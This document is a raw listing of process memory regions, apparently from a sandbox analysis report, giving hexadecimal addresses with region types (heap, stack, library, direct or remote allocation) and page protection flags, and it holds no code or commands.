page read and write
280E000
stack
page read and write
20360000
trusted library allocation
page read and write
23AF9000
trusted library allocation
page read and write
7F0000
heap
page read and write
20450000
trusted library allocation
page read and write
23CB5000
trusted library allocation
page read and write
26A3E000
stack
page read and write
83F000
heap
page read and write
247EF000
trusted library allocation
page read and write
242000
trusted library allocation
page read and write
2008F000
trusted library allocation
page read and write
246EA000
trusted library allocation
page read and write
20283000
trusted library allocation
page read and write
4AC5000
heap
page read and write
207A6000
heap
page read and write
25621000
trusted library allocation
page read and write
5EED000
stack
page read and write
24B4C000
trusted library allocation
page read and write
24A85000
trusted library allocation
page read and write
44F000
heap
page read and write
49F0000
heap
page read and write
3477000
trusted library allocation
page read and write
25312000
trusted library allocation
page read and write
2C0C000
trusted library allocation
page read and write
24833000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
2BA9000
heap
page read and write
243A0000
trusted library allocation
page read and write
5B0000
heap
page read and write
4450000
direct allocation
page read and write
251ED000
trusted library allocation
page read and write
20EF3000
trusted library allocation
page read and write
4DB9000
heap
page read and write
2023C000
stack
page read and write
20280000
trusted library allocation
page read and write
20010000
trusted library allocation
page read and write
230000
direct allocation
page read and write
20280000
trusted library allocation
page read and write
EB0000
trusted library allocation
page read and write
468000
heap
page read and write
20B4E000
stack
page read and write
242F5000
trusted library allocation
page read and write
52FE000
stack
page read and write
2562B000
trusted library allocation
page read and write
4542000
trusted library allocation
page read and write
248C0000
trusted library allocation
page read and write
23952000
trusted library allocation
page read and write
254CD000
trusted library allocation
page read and write
259DB000
trusted library allocation
page read and write
220000
heap
page read and write
282000
trusted library allocation
page read and write
248C3000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
810000
trusted library allocation
page read and write
25039000
trusted library allocation
page read and write
243C3000
trusted library allocation
page read and write
263D2000
trusted library allocation
page read and write
20AF8000
trusted library allocation
page read and write
23F46000
trusted library allocation
page read and write
3E5000
heap
page read and write
24847000
trusted library allocation
page read and write
2050F000
stack
page read and write
3E06000
heap
page read and write
24035000
trusted library allocation
page read and write
2710000
trusted library allocation
page read and write
206F000
stack
page read and write
255A4000
trusted library allocation
page read and write
6B2000
heap
page read and write
2F2D000
trusted library allocation
page read and write
2450F000
trusted library allocation
page read and write
25564000
trusted library allocation
page read and write
253D0000
trusted library allocation
page read and write
20C1D000
stack
page read and write
24C67000
trusted library allocation
page read and write
2008F000
stack
page read and write
1FD10000
trusted library allocation
page read and write
1EB0000
heap
page read and write
A90000
trusted library allocation
page read and write
20EED000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
6D0000
heap
page read and write
24C80000
trusted library allocation
page read and write
2478D000
trusted library allocation
page read and write
24C49000
trusted library allocation
page read and write
25252000
trusted library allocation
page read and write
B4A000
trusted library allocation
page read and write
244F8000
trusted library allocation
page read and write
252ED000
trusted library allocation
page read and write
25418000
trusted library allocation
page read and write
1FBB0000
remote allocation
page read and write
3C2F000
stack
page read and write
20A7D000
stack
page read and write
4634000
heap
page execute and read and write
2BC5000
heap
page read and write
B42000
trusted library allocation
page read and write
5E20000
heap
page read and write
200A2000
heap
page read and write
C0000
trusted library section
page read and write
23CCB000
trusted library allocation
page read and write
248E3000
trusted library allocation
page read and write
AB000
stack
page read and write
34B000
heap
page read and write
20350000
trusted library allocation
page read and write
24A00000
trusted library allocation
page read and write
3DE4000
heap
page read and write
2391E000
trusted library allocation
page read and write
210EE000
trusted library allocation
page read and write
2F67000
trusted library allocation
page read and write
480000
heap
page read and write
705000
heap
page read and write
7E4000
heap
page read and write
264DA000
trusted library allocation
page read and write
47B5000
heap
page read and write
1FC32000
trusted library allocation
page read and write
2407C000
trusted library allocation
page read and write
243D2000
trusted library allocation
page read and write
3AF0000
heap
page read and write
90D000
stack
page read and write
2532A000
trusted library allocation
page read and write
4470000
trusted library allocation
page read and write
1FEF0000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
2BAC000
trusted library allocation
page read and write
25563000
trusted library allocation
page read and write
2045D000
stack
page read and write
25A0A000
trusted library allocation
page read and write
248F2000
trusted library allocation
page read and write
23FB3000
trusted library allocation
page read and write
538F000
stack
page read and write
1EA000
trusted library allocation
page read and write
5F70000
heap
page read and write
24568000
trusted library allocation
page read and write
20B61000
heap
page read and write
20060000
trusted library allocation
page read and write
24608000
trusted library allocation
page read and write
20360000
trusted library allocation
page read and write
23BD8000
trusted library allocation
page read and write
2054F000
stack
page read and write
24180000
trusted library allocation
page read and write
2610000
heap
page execute and read and write
20280000
trusted library allocation
page read and write
24B05000
trusted library allocation
page read and write
22DF000
stack
page read and write
4570000
heap
page execute and read and write
20060000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
2254B000
trusted library allocation
page read and write
20000000
remote allocation
page read and write
1FC50000
trusted library allocation
page read and write
64A0000
direct allocation
page execute and read and write
290000
heap
page read and write
2543B000
trusted library allocation
page read and write
30CA000
heap
page read and write
243AE000
trusted library allocation
page read and write
23887000
trusted library allocation
page read and write
251BA000
trusted library allocation
page read and write
25F20000
trusted library allocation
page read and write
25201000
trusted library allocation
page read and write
249B3000
trusted library allocation
page read and write
1FC46000
trusted library allocation
page read and write
2441000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
20E77000
trusted library allocation
page read and write
240DB000
trusted library allocation
page read and write
23E48000
trusted library allocation
page read and write
20CDB000
trusted library allocation
page read and write
20CB9000
stack
page read and write
2552C000
trusted library allocation
page read and write
20340000
trusted library allocation
page read and write
47B0000
direct allocation
page read and write
20AF0000
trusted library allocation
page read and write
2CD000
heap
page read and write
205000
trusted library allocation
page execute and read and write
255EF000
trusted library allocation
page read and write
24999000
trusted library allocation
page read and write
26598000
trusted library allocation
page read and write
524E000
stack
page read and write
1FC30000
trusted library allocation
page read and write
2490000
trusted library allocation
page read and write
23F47000
trusted library allocation
page read and write
1FD0E000
stack
page read and write
1FC10000
trusted library allocation
page read and write
2B3D000
heap
page read and write
2B83000
heap
page read and write
BF0000
heap
page execute and read and write
24451000
trusted library allocation
page read and write
24951000
trusted library allocation
page read and write
22769000
trusted library allocation
page read and write
2450F000
trusted library allocation
page read and write
3DE4000
heap
page read and write
26E34000
trusted library allocation
page read and write
23B58000
trusted library allocation
page read and write
23C0A000
trusted library allocation
page read and write
2020D000
stack
page read and write
317000
trusted library allocation
page read and write
2B38000
heap
page read and write
7F7000
heap
page read and write
FC0000
trusted library allocation
page execute and read and write
797000
heap
page read and write
201AD000
stack
page read and write
241AD000
trusted library allocation
page read and write
2B1D000
trusted library allocation
page read and write
233BD000
stack
page read and write
22069000
trusted library allocation
page read and write
4A5E000
stack
page read and write
2921000
trusted library allocation
page read and write
25AB5000
trusted library allocation
page read and write
2F1D000
stack
page read and write
26492000
trusted library allocation
page read and write
51EE000
stack
page read and write | page guard
2B99000
heap
page read and write
1FDA0000
trusted library allocation
page read and write
910000
heap
page read and write
23BA9000
trusted library allocation
page read and write
24790000
trusted library allocation
page read and write
26CEB000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
5CB000
unkown
page readonly
24085000
trusted library allocation
page read and write
4B46000
heap
page read and write
23DFB000
trusted library allocation
page read and write
B4E000
stack
page read and write
4EDE000
stack
page read and write
24AFD000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
5A1000
unkown
page execute read
2868000
trusted library allocation
page read and write
24A3D000
trusted library allocation
page read and write
524E000
stack
page read and write
26EF2000
trusted library allocation
page read and write
4651000
trusted library allocation
page read and write
470000
heap
page read and write
32B0000
heap
page read and write
30B1000
heap
page read and write
569000
heap
page read and write
24FDB000
trusted library allocation
page read and write
23D38000
trusted library allocation
page read and write
23A6F000
trusted library allocation
page read and write
207F8000
heap
page read and write
200EE000
stack
page read and write
4E44000
heap
page read and write
24C6C000
trusted library allocation
page read and write
248C5000
trusted library allocation
page read and write
2402C000
trusted library allocation
page read and write
10C000
stack
page read and write
3FAC000
remote allocation
page execute and read and write
2462C000
trusted library allocation
page read and write
4D3E000
stack
page read and write
2600B000
trusted library allocation
page read and write
23A92000
trusted library allocation
page read and write
2BBD000
heap
page read and write
23A1E000
stack
page read and write
2480000
heap
page read and write
460000
heap
page read and write
2487E000
trusted library allocation
page read and write
259DD000
trusted library allocation
page read and write
4770000
direct allocation
page read and write
24F39000
trusted library allocation
page read and write
254A6000
trusted library allocation
page read and write
251D2000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
478000
heap
page read and write
4B17000
heap
page read and write
20340000
trusted library allocation
page read and write
25BE000
stack
page read and write
55CE000
stack
page read and write
2BE5000
heap
page read and write
2850000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
3100000
heap
page read and write
20010000
trusted library allocation
page read and write
637000
heap
page read and write
2352E000
stack
page read and write
2703000
trusted library allocation
page read and write
2B34000
heap
page read and write
1FF80000
trusted library allocation
page read and write
25653000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
51CB000
stack
page read and write
EF0000
trusted library allocation
page execute and read and write
2AE0000
heap
page read and write
20510000
heap
page read and write
4F6E000
stack
page read and write
30EC000
heap
page read and write
1FF60000
trusted library allocation
page read and write
4B80000
direct allocation
page read and write
397000
heap
page read and write
20010000
trusted library allocation
page read and write
244AA000
trusted library allocation
page read and write
A70000
trusted library allocation
page read and write
20070000
trusted library allocation
page read and write
25A08000
trusted library allocation
page read and write
1FCB0000
trusted library allocation
page read and write
547E000
stack
page read and write
F70000
trusted library allocation
page read and write
20070000
trusted library allocation
page read and write
E80000
trusted library allocation
page execute and read and write
30FC000
heap
page read and write
2F80000
heap
page read and write
22F30000
heap
page execute and read and write
207BE000
stack
page read and write
253F4000
trusted library allocation
page read and write
466000
heap
page read and write
256E000
stack
page read and write
24B18000
trusted library allocation
page read and write
24D6E000
stack
page read and write
3CE000
heap
page read and write
24DAE000
trusted library allocation
page read and write
1FF5F000
stack
page read and write
2AE4000
heap
page read and write
25A0D000
trusted library allocation
page read and write
23E2A000
trusted library allocation
page read and write
20D00000
trusted library allocation
page read and write
24C26000
trusted library allocation
page read and write
4770000
direct allocation
page read and write
44B000
heap
page read and write
23A6E000
stack
page read and write
24C76000
trusted library allocation
page read and write
5B0000
unkown
page readonly
2BAC000
heap
page read and write
465B000
heap
page read and write
2F0000
heap
page read and write
23F3C000
trusted library allocation
page read and write
381D000
heap
page read and write
1FC51000
trusted library allocation
page read and write
23A91000
trusted library allocation
page read and write
1FE43000
heap
page read and write
312000
trusted library allocation
page read and write
4470000
trusted library allocation
page read and write
2090F000
heap
page read and write
25473000
trusted library allocation
page read and write
23E4A000
trusted library allocation
page read and write
9C000
stack
page read and write
24674000
trusted library allocation
page read and write
25098000
trusted library allocation
page read and write
26FC4000
trusted library allocation
page read and write
245DF000
trusted library allocation
page read and write
517E000
stack
page read and write
24922000
trusted library allocation
page read and write
24FAF000
trusted library allocation
page read and write
23DE3000
trusted library allocation
page read and write
28AB000
trusted library allocation
page read and write
2456D000
trusted library allocation
page read and write
1D72000
heap
page read and write
1E0000
trusted library section
page read and write
4B1E000
stack
page read and write
23BC6000
trusted library allocation
page read and write
2500D000
trusted library allocation
page read and write
4AAE000
stack
page read and write
1FC50000
trusted library allocation
page read and write
2509D000
trusted library allocation
page read and write
20E05000
trusted library allocation
page read and write
4C90000
heap
page read and write
210000
trusted library allocation
page read and write
267BE000
stack
page read and write
64B000
heap
page read and write
243F2000
trusted library allocation
page read and write
20F0C000
trusted library allocation
page read and write
250D7000
trusted library allocation
page read and write
23905000
trusted library allocation
page read and write
3477000
trusted library allocation
page read and write
24463000
trusted library allocation
page read and write
2BE8000
heap
page read and write
4896000
heap
page read and write
9C0000
trusted library allocation
page read and write
23D31000
trusted library allocation
page read and write
2E58000
trusted library allocation
page read and write
23D79000
trusted library allocation
page read and write
4930000
trusted library allocation
page read and write
204CE000
stack
page read and write
41C9000
heap
page read and write
23D2B000
trusted library allocation
page read and write
49A000
heap
page read and write
25E76000
trusted library allocation
page read and write
4480000
direct allocation
page read and write
2660000
trusted library allocation
page read and write
365C000
remote allocation
page execute and read and write
466000
heap
page read and write
3910000
heap
page read and write
7C7000
heap
page read and write
257E000
stack
page read and write | page guard
1DD000
trusted library allocation
page execute and read and write
1A0000
direct allocation
page read and write
B0000
heap
page read and write
59E000
stack
page read and write
23BEE000
trusted library allocation
page read and write
25FC0000
trusted library allocation
page read and write
26E20000
trusted library allocation
page read and write
25349000
trusted library allocation
page read and write
2BA1000
heap
page read and write
236CE000
stack
page read and write
1FDA0000
trusted library allocation
page read and write
2567B000
trusted library allocation
page read and write
23D61000
trusted library allocation
page read and write
2495A000
trusted library allocation
page read and write
3F90000
heap
page read and write
20550000
trusted library allocation
page read and write
24983000
trusted library allocation
page read and write
23F54000
trusted library allocation
page read and write
20220000
trusted library allocation
page read and write
10000
heap
page read and write
2453D000
trusted library allocation
page read and write
250A5000
trusted library allocation
page read and write
2D4000
heap
page read and write
20280000
trusted library allocation
page read and write
2672000
trusted library allocation
page read and write
23900000
trusted library allocation
page read and write
20010000
trusted library allocation
page read and write
4D4000
heap
page read and write
20380000
trusted library allocation
page read and write
26DD0000
trusted library allocation
page read and write
23B80000
trusted library allocation
page read and write
23DC0000
trusted library allocation
page read and write
20F0A000
trusted library allocation
page read and write
390000
heap
page read and write
23CFC000
trusted library allocation
page read and write
200D0000
trusted library allocation
page read and write
520000
heap
page read and write
1FCDE000
stack
page read and write
47CE000
heap
page read and write
30D8000
heap
page read and write
A40000
heap
page read and write
26714000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
20720000
heap
page read and write
5180000
heap
page read and write
248DB000
trusted library allocation
page read and write
8D0000
trusted library allocation
page read and write
1FD10000
trusted library allocation
page read and write
2946000
trusted library allocation
page read and write
4860000
remote allocation
page read and write
23BF000
stack
page read and write
23A32000
trusted library allocation
page read and write
252A8000
trusted library allocation
page read and write
25446000
trusted library allocation
page read and write
1A0000
heap
page read and write
244C8000
trusted library allocation
page read and write
20CE1000
trusted library allocation
page read and write
2EBD000
trusted library allocation
page read and write
2484000
trusted library allocation
page read and write
25FC5000
trusted library allocation
page read and write
4A0000
trusted library allocation
page execute and read and write
3167000
heap
page read and write
252CB000
trusted library allocation
page read and write
25DF000
stack
page read and write
265DD000
trusted library allocation
page read and write
23D02000
trusted library allocation
page read and write
2508A000
trusted library allocation
page read and write
2004E000
stack
page read and write
2530000
trusted library allocation
page read and write
20070000
trusted library allocation
page read and write
1FD5E000
stack
page read and write
23BD5000
trusted library allocation
page read and write
94E000
stack
page read and write
2883000
trusted library allocation
page read and write
420000
trusted library allocation
page read and write
46B000
heap
page read and write
4B9000
trusted library allocation
page read and write
208C0000
trusted library allocation
page read and write
250C3000
trusted library allocation
page read and write
23CCC000
trusted library allocation
page read and write
2B66000
trusted library allocation
page read and write
263AE000
trusted library allocation
page read and write
6DA000
heap
page read and write
273E000
stack
page read and write
272C000
trusted library allocation
page read and write
2515B000
trusted library allocation
page read and write
2390B000
trusted library allocation
page read and write
23E12000
trusted library allocation
page read and write
48C0000
heap
page read and write
23EB9000
trusted library allocation
page read and write
59C000
stack
page read and write
204C000
stack
page read and write
4BA0000
heap
page read and write
829000
heap
page read and write
5E24000
heap
page read and write
429000
trusted library allocation
page read and write
21DEA000
trusted library allocation
page read and write
720000
heap
page read and write
24ABE000
trusted library allocation
page read and write
AB0000
trusted library allocation
page execute and read and write
2343E000
stack
page read and write
3103000
heap
page read and write
E70000
direct allocation
page read and write
B90000
trusted library allocation
page read and write
20340000
trusted library allocation
page read and write
9F0000
heap
page read and write
570000
heap
page read and write
2040E000
stack
page read and write
2BFA000
heap
page read and write
A4F000
stack
page read and write
25265000
trusted library allocation
page read and write
21180000
trusted library allocation
page read and write
2521E000
trusted library allocation
page read and write
240EF000
trusted library allocation
page read and write
4F9D000
stack
page read and write
20E89000
trusted library allocation
page read and write
2BA0000
heap
page read and write
20F08000
trusted library allocation
page read and write
23E2A000
trusted library allocation
page read and write
2A0000
heap
page read and write
24FDD000
trusted library allocation
page read and write
4760000
direct allocation
page read and write
20280000
trusted library allocation
page read and write
23F77000
trusted library allocation
page read and write
4B0000
heap
page read and write
20A4D000
stack
page read and write
276E000
trusted library allocation
page read and write
B70000
heap
page execute and read and write
25A98000
trusted library allocation
page read and write
26FC9000
trusted library allocation
page read and write
200D0000
trusted library allocation
page read and write
23B4D000
trusted library allocation
page read and write
20000
heap
page read and write
577000
heap
page read and write
155000
trusted library allocation
page execute and read and write
EE0000
direct allocation
page read and write
249F8000
trusted library allocation
page read and write
2B52000
heap
page read and write
23EDD000
trusted library allocation
page read and write
4470000
trusted library allocation
page read and write
30B1000
heap
page read and write
63FE000
stack
page read and write
4470000
trusted library allocation
page read and write
2B9D000
trusted library allocation
page read and write
5B0000
unkown
page readonly
4A0E000
stack
page read and write
20360000
trusted library allocation
page read and write
8C000
stack
page read and write
2BC8000
heap
page read and write
24B74000
trusted library allocation
page read and write
F00000
trusted library allocation
page execute and read and write
4BBE000
heap
page read and write
25056000
trusted library allocation
page read and write
30B5000
heap
page read and write
1FC50000
trusted library allocation
page read and write
20070000
trusted library allocation
page read and write
4E67000
heap
page read and write
200D0000
trusted library allocation
page read and write
2496B000
trusted library allocation
page read and write
26698000
trusted library allocation
page read and write
4660000
trusted library allocation
page read and write
123000
trusted library allocation
page execute and read and write
271E000
stack
page read and write
23AF0000
trusted library allocation
page read and write
A62000
trusted library allocation
page read and write
1FBB0000
remote allocation
page read and write
210000
trusted library allocation
page read and write
23AA9000
trusted library allocation
page read and write
23D9D000
trusted library allocation
page read and write
23EC5000
trusted library allocation
page read and write
4D69000
heap
page read and write
2BA000
heap
page read and write
1FC30000
trusted library allocation
page read and write
5E3E000
stack
page read and write
20280000
trusted library allocation
page read and write
25F93000
trusted library allocation
page read and write
25101000
trusted library allocation
page read and write
26550000
trusted library allocation
page read and write
20010000
trusted library allocation
page read and write
26743000
trusted library allocation
page read and write
24A18000
trusted library allocation
page read and write
20000000
heap
page read and write
26B000
trusted library allocation
page execute and read and write
18C000
stack
page read and write
5099000
heap
page read and write
20240000
heap
page read and write
A0D000
stack
page read and write
24F98000
trusted library allocation
page read and write
20090000
heap
page read and write
3B0000
heap
page read and write
2F12000
trusted library allocation
page read and write
1D0000
heap
page read and write
5071000
heap
page read and write
1FC50000
trusted library allocation
page read and write
20BA4000
heap
page read and write
C0000
direct allocation
page read and write
3ABF000
stack
page read and write
1D0D000
heap
page read and write
25F02000
trusted library allocation
page read and write
3DFD000
heap
page read and write
EE0000
trusted library allocation
page read and write
2940000
trusted library allocation
page read and write
2B6F000
heap
page read and write
522E000
stack
page read and write
26A000
trusted library allocation
page read and write
7CF8000
direct allocation
page execute and read and write
46C000
heap
page read and write
DFE000
stack
page read and write
24E4B000
trusted library allocation
page read and write
4B20000
direct allocation
page read and write
23DB5000
trusted library allocation
page read and write
25278000
trusted library allocation
page read and write
35F000
heap
page read and write
4B30000
direct allocation
page read and write
1FDF0000
heap
page read and write
27F000
stack
page read and write
53CE000
stack
page read and write
4AF0000
heap
page read and write
23EAD000
trusted library allocation
page read and write
24598000
trusted library allocation
page read and write
61DD000
stack
page read and write
2876000
trusted library allocation
page read and write
2505E000
stack
page read and write
B7000
stack
page read and write
244C2000
trusted library allocation
page read and write
1F20000
heap
page read and write
2FC000
stack
page read and write
3659000
trusted library allocation
page read and write
24B18000
trusted library allocation
page read and write
2460A000
trusted library allocation
page read and write
21E4A000
trusted library allocation
page read and write
23DCB000
trusted library allocation
page read and write
243DB000
trusted library allocation
page read and write
25428000
trusted library allocation
page read and write
26083000
trusted library allocation
page read and write
24BEF000
trusted library allocation
page read and write
23C3E000
trusted library allocation
page read and write
23A02000
trusted library allocation
page read and write
487E000
stack
page read and write
287F000
stack
page read and write
4F7E000
stack
page read and write
249A1000
trusted library allocation
page read and write
24064000
trusted library allocation
page read and write
1FD10000
trusted library allocation
page read and write
253B0000
trusted library allocation
page read and write
25C0000
trusted library allocation
page execute and read and write
24F93000
trusted library allocation
page read and write
520000
trusted library allocation
page execute and read and write
5A0000
unkown
page readonly
2558B000
trusted library allocation
page read and write
203CC000
stack
page read and write
2FC000
heap
page read and write
2067D000
stack
page read and write
23B4F000
trusted library allocation
page read and write
222A8000
trusted library allocation
page read and write
24F8E000
trusted library allocation
page read and write
1FDA0000
trusted library allocation
page read and write
2468B000
trusted library allocation
page read and write
B20000
trusted library allocation
page read and write
20000
heap
page read and write
23D73000
trusted library allocation
page read and write
25A3E000
trusted library allocation
page read and write
207CF000
stack
page read and write
3DF8000
heap
page read and write
4BEE000
stack
page read and write
49E0000
trusted library allocation
page execute and read and write
2537D000
trusted library allocation
page read and write
52AE000
stack
page read and write | page guard
24A47000
trusted library allocation
page read and write
610F000
stack
page read and write
3C6D000
stack
page read and write
3469000
trusted library allocation
page read and write
1FC20000
trusted library allocation
page execute and read and write
23ED0000
trusted library allocation
page read and write
23BEE000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
254D6000
trusted library allocation
page read and write
26E2F000
trusted library allocation
page read and write
22956000
trusted library allocation
page read and write
4FDE000
stack
page read and write | page guard
20280000
trusted library allocation
page read and write
30FA000
heap
page read and write
1FC30000
trusted library allocation
page read and write
25219000
trusted library allocation
page read and write
538E000
stack
page read and write
2562B000
trusted library allocation
page read and write
1FDB0000
heap
page read and write
249E8000
trusted library allocation
page read and write
5B0000
heap
page read and write
438000
heap
page read and write
257B8000
trusted library allocation
page read and write
2466D000
trusted library allocation
page read and write
B00000
trusted library allocation
page execute and read and write
5EEE000
stack
page read and write
466000
heap
page read and write
26173000
trusted library allocation
page read and write
5E22000
heap
page read and write
20222000
trusted library allocation
page read and write
20D5D000
trusted library allocation
page read and write
26F3D000
trusted library allocation
page read and write
200000
direct allocation
page read and write
1FC50000
trusted library allocation
page read and write
201ED000
stack
page read and write
2509E000
stack
page read and write
2072B000
heap
page read and write
382F000
heap
page read and write
1FC50000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
2480E000
trusted library allocation
page read and write
3F0000
trusted library allocation
page read and write
2022C000
stack
page read and write
20755000
heap
page read and write
23FED000
trusted library allocation
page read and write
24469000
trusted library allocation
page read and write
20070000
trusted library allocation
page read and write
2546E000
trusted library allocation
page read and write
3109000
heap
page read and write
2396A000
trusted library allocation
page read and write
23EB0000
trusted library allocation
page read and write
560000
heap
page read and write
24031000
trusted library allocation
page read and write
20EE9000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
1FB3F000
stack
page read and write
604000
heap
page read and write
24AA6000
trusted library allocation
page read and write
245F8000
trusted library allocation
page read and write
6756000
heap
page read and write
2522D000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
4B30000
heap
page read and write
246EA000
trusted library allocation
page read and write
2D0000
heap
page read and write
1FC50000
trusted library allocation
page read and write
2616E000
trusted library allocation
page read and write
30BE000
heap
page read and write
608E000
stack
page read and write | page guard
25C07000
trusted library allocation
page read and write
250B5000
trusted library allocation
page read and write
FCF000
stack
page read and write
4510000
direct allocation
page read and write
970000
trusted library allocation
page read and write
24E40000
trusted library allocation
page read and write
F40000
trusted library allocation
page read and write
23CB3000
trusted library allocation
page read and write
23DFB000
trusted library allocation
page read and write
24538000
trusted library allocation
page read and write
2017D000
stack
page read and write
20230000
trusted library allocation
page read and write
30D8000
heap
page read and write
24047000
trusted library allocation
page read and write
23D49000
trusted library allocation
page read and write
20340000
trusted library allocation
page read and write
950000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
21142000
trusted library allocation
page read and write
23CE4000
trusted library allocation
page read and write
F60000
trusted library allocation
page read and write
23C60000
heap
page read and write
24A0F000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
A30000
trusted library allocation
page read and write
254B9000
trusted library allocation
page read and write
207F0000
heap
page read and write
980000
trusted library allocation
page read and write
1720000
remote allocation
page execute and read and write
245D5000
trusted library allocation
page read and write
2F0000
heap
page read and write
1FC50000
trusted library allocation
page read and write
2012E000
stack
page read and write
45C0000
direct allocation
page read and write
4AE4000
heap
page read and write
4B33000
heap
page read and write
2B9E000
heap
page read and write
23D15000
trusted library allocation
page read and write
20CE8000
trusted library allocation
page read and write
920000
trusted library allocation
page read and write
23D52000
trusted library allocation
page read and write
2444B000
trusted library allocation
page read and write
24FA7000
trusted library allocation
page read and write
2484A000
trusted library allocation
page read and write
26C2E000
stack
page read and write
24AB9000
trusted library allocation
page read and write
4CB1000
heap
page read and write
19D000
stack
page read and write
243B8000
trusted library allocation
page read and write
25247000
trusted library allocation
page read and write
E40000
trusted library allocation
page read and write
30FA000
heap
page read and write
1FC50000
trusted library allocation
page read and write
3129000
heap
page read and write
10000
heap
page read and write
261E5000
heap
page read and write
6AE000
stack
page read and write
2395C000
stack
page read and write
60BE000
stack
page read and write | page guard
25671000
trusted library allocation
page read and write
1A8000
heap
page read and write
4D9000
heap
page read and write
2371C000
stack
page read and write
230000
direct allocation
page read and write
359000
heap
page read and write
2518F000
trusted library allocation
page read and write
26F5000
trusted library allocation
page read and write
24499000
trusted library allocation
page read and write
261A0000
trusted library allocation
page read and write
37FD000
stack
page read and write
23EE8000
trusted library allocation
page read and write
23E1B000
trusted library allocation
page read and write
2406D000
trusted library allocation
page read and write
23E8F000
stack
page read and write
24121000
trusted library allocation
page read and write
4B3D000
heap
page read and write
23ABE000
stack
page read and write
250CC000
trusted library allocation
page read and write
254A5000
trusted library allocation
page read and write
260000
trusted library allocation
page read and write
2180000
trusted library allocation
page read and write
1FFA0000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
E90000
direct allocation
page read and write
FB0000
direct allocation
page read and write
30AF000
stack
page read and write
20000
heap
page read and write
24954000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
25635000
trusted library allocation
page read and write
20060000
trusted library allocation
page read and write
1FDF0000
trusted library allocation
page read and write
23E12000
trusted library allocation
page read and write
E3000
trusted library allocation
page execute and read and write
20010000
trusted library allocation
page read and write
24B15000
trusted library allocation
page read and write
24A77000
trusted library allocation
page read and write
257000
stack
page read and write
4470000
trusted library allocation
page read and write
23CE3000
trusted library allocation
page read and write
20260000
trusted library allocation
page read and write
2C4000
heap
page read and write
497C000
stack
page read and write
21E69000
trusted library allocation
page read and write
24D7000
trusted library allocation
page read and write
1FE23000
heap
page read and write
1FD10000
trusted library allocation
page read and write
20EFB000
trusted library allocation
page read and write
3C4000
heap
page read and write
729000
heap
page read and write
24832000
trusted library allocation
page read and write
25649000
trusted library allocation
page read and write
30C4000
heap
page read and write
21C000
stack
page read and write
24176000
trusted library allocation
page read and write
20F51000
trusted library allocation
page read and write
23A28000
trusted library allocation
page read and write
24879000
trusted library allocation
page read and write
2393B000
trusted library allocation
page read and write
2B5E000
heap
page read and write
23C12000
trusted library allocation
page read and write
835C000
direct allocation
page execute and read and write
4AEB000
heap
page read and write
23EA1000
trusted library allocation
page read and write
24121000
trusted library allocation
page read and write
2545F000
trusted library allocation
page read and write
231DC000
stack
page read and write
1FA0000
heap
page read and write
3A3C000
stack
page read and write
297000
trusted library allocation
page execute and read and write
24085000
trusted library allocation
page read and write
25B5E000
stack
page read and write
245F8000
trusted library allocation
page read and write
49CE000
stack
page read and write
205FE000
stack
page read and write
203BF000
trusted library allocation
page read and write
2453F000
trusted library allocation
page read and write
1FF9E000
stack
page read and write
1FC50000
trusted library allocation
page read and write
25D2D000
stack
page read and write
276B000
trusted library allocation
page read and write
1CF0000
heap
page read and write
4B4000
heap
page read and write
615D000
stack
page read and write
2C11000
trusted library allocation
page read and write
23CEA000
trusted library allocation
page read and write
1FD10000
trusted library allocation
page read and write
107000
stack
page read and write
505B000
heap
page read and write
EA0000
trusted library allocation
page read and write
24B64000
trusted library allocation
page read and write
5B1000
unkown
page execute read
266B5000
trusted library allocation
page read and write
2011B000
stack
page read and write
2502B000
trusted library allocation
page read and write
383F000
heap
page read and write
4E7E000
heap
page read and write
20880000
heap
page read and write
1C0000
heap
page read and write
4560000
direct allocation
page read and write
2417B000
trusted library allocation
page read and write
24971000
trusted library allocation
page read and write
4BA4000
heap
page read and write
82C000
heap
page read and write
20DB3000
trusted library allocation
page read and write
20300000
heap
page read and write
20E00000
heap
page read and write
9C000
stack
page read and write
25119000
trusted library allocation
page read and write
459000
heap
page read and write
20281000
trusted library allocation
page read and write
23A7B000
trusted library allocation
page read and write
20000
heap
page read and write
20450000
trusted library allocation
page read and write
4DB5000
heap
page read and write
5B1000
unkown
page execute read
23AD0000
heap
page read and write
501E000
stack
page read and write
2B91000
heap
page read and write
4AF000
stack
page read and write
2518A000
trusted library allocation
page read and write
10000
heap
page read and write
890000
trusted library allocation
page read and write
3633000
trusted library allocation
page read and write
4EFD000
heap
page read and write
24B35000
trusted library allocation
page read and write
23E48000
trusted library allocation
page read and write
A60000
heap
page execute and read and write
4FAF000
heap
page read and write
1FC50000
trusted library allocation
page read and write
20070000
trusted library allocation
page read and write
2C8000
trusted library allocation
page read and write
250A2000
trusted library allocation
page read and write
25531000
trusted library allocation
page read and write
45AF000
stack
page read and write
244B0000
trusted library allocation
page read and write
203B0000
trusted library allocation
page read and write
20080000
trusted library allocation
page read and write
5550000
heap
page read and write
4616000
heap
page execute and read and write
230000
heap
page read and write
185C000
remote allocation
page execute and read and write
23E07000
trusted library allocation
page read and write
20C0F000
stack
page read and write
1B0000
trusted library section
page read and write
1FC50000
trusted library allocation
page read and write
26807000
trusted library allocation
page read and write
2070A000
heap
page read and write
239B1000
trusted library allocation
page read and write
25A6D000
trusted library allocation
page read and write
24313000
trusted library allocation
page read and write
2048F000
stack
page read and write
5BB000
unkown
page readonly
23D47000
trusted library allocation
page read and write
2B9C000
heap
page read and write
26C72000
trusted library allocation
page read and write
24126000
